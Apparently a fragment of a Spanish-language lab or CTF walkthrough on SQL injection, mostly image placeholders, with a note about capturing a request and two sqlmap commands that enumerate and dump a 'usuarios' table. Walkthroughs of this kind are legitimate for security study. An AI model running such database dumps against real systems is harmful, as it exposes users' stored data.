image.png

image.png

image.png

capturamos la peticion y la guardamos. luego usamos sqlmap

image.png

image.png

image.png

❯ sqlmap -r request.txt -D users -t usuarios --columns

image.png

❯ sqlmap -r request.txt -D users -t usuarios --columns --dump

image.png

image.png

image.png

image.png

image.png

image.png

image.png

image.png